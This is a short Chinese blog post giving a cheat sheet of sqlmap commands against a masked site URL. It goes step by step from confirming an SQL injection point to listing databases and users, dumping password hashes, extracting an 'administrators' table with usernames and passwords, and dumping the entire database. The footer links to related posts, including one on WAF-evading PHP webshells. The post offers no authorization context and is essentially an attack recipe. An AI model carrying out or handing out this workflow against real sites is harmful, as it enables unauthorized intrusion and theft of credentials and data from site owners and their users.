当前位置:首页 > 文章 > 正文内容

sqlmap基础命令

admin2021-01-16文章3413

检查注入点是否可用

sqlmap -u “http://www.******.com/subcat.php?id=2” --batch

暴库,看看都有哪些数据库:

#sqlmap -u   --dbs

找出web当前使用的是哪个数据库:

#sqlmap -u http://www.******.com/subcat.php?id=2 --current-db

找出web当前数据库的账户

#sqlmap -u http://www.******.com/subcat.php?id=2 --current-user

列出数据库所有用户:

#sqlmap -u http://www.******.com/subcat.php?id=2 --users

获取数据库账户与密码:

#sqlmap -u http://www.******.com/subcat.php?id=2 --passwords

获取当前数据库的所有表:

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history --tables

-D  指定数据库

找出表中都有哪些字段:

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators --columns

-T 指定表

爆字段内容:

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators -C admin_first_name,admin_id,admin_last_name,admin_password,admin_username --dump

 -C:指定字段

 --dump:导出,否则shell上不会显示内容,只能到日志中查看

若内容太多,可以指定显示那一部分:

 --start:指定导出的开始的行

 --stop:指定导出结束的行

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators -C admin_first_name,admin_id,admin_last_name,admin_password,admin_username --start 1 --stop 10 --dump

拖库:

#sqlmap -u http://www.******.com/subcat.php?id=2 --dump-all


扫描二维码推送至手机访问。

版权声明:本文由Mpg blog发布,如需转载请注明出处。

分享给朋友:

相关文章

整理的最新WebSHell (php过狗一句话)

整理的最新WebSHell (php过狗一句话)

中国菜刀下载,基于原版中国菜刀优化版20160309.(网络转载的软件,懒得上传,自行琢磨)下载地址:http://download.csdn.net/detail/settoken/9457567h...

小程序用户隐私保护指引的填写指南参考

小程序用户隐私保护指引的填写指南仅供参考为了分辨用户,开发者将在获取你的明示同意后,收集你的微信昵称、头像。为了显示距离,开发者将在获取你的明示同意后,收集你的位置信息。为了用户互动,开发者将在获取你...

智能DIY官网程序远程附件修复

1.0.73问题:多用户不能独立设置远程附件配置。修改文件lf_bddiy/core/modules/admin/models/core_setting/AttachmentConfigModel.p...

针对登录页面渗透测试的思路全总结

针对登录页面渗透测试的思路全总结

免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并...

2024龙年艺术字源文件,整整60套设计龙年素材

2024龙年艺术字源文件,整整60套设计龙年素材

下载地址:https://pan.baidu.com/s/1L3Fqo-YC1pc-Oo-lqLa4zQ?pwd=v996...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。